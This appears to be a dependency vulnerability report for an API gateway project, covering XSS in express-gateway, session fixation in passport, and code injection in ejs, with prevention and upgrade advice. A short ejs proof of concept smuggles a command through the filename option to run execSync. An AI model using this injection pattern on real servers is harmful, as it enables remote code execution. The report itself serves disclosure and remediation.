Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to a lack of input validation and output sanitization when handling user and application creation (POST /) and update (PUT /:id) requests.. An attacker can inject and execute arbitrary scripts in the context of a user's browser by submitting crafted input to the affected endpoint.
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as < and > can be coded as > in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?,&,/,<,>and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
There is no fixed version for express-gateway.
References
medium severity
- Vulnerable module: passport
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › passport@0.4.1
Overview
passport is a Simple, unobtrusive authentication for Node.js.
Affected versions of this package are vulnerable to Session Fixation. When a user logs in or logs out, the session is regenerated instead of being closed.
Remediation
Upgrade passport to version 0.6.0 or higher.
References
medium severity
- Vulnerable module: ejs
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Arbitrary Code Injection via the render and renderFile. If external input is flowing into the options parameter, an attacker is able run arbitrary code. This include the filename, compileDebug, and client option.
POC
let ejs = require('ejs')
ejs.render('./views/test.ejs',{
filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
compileDebug: true,
message: 'test',
client: true
})
Remediation
Upgrade ejs to version 3.1.6 or higher.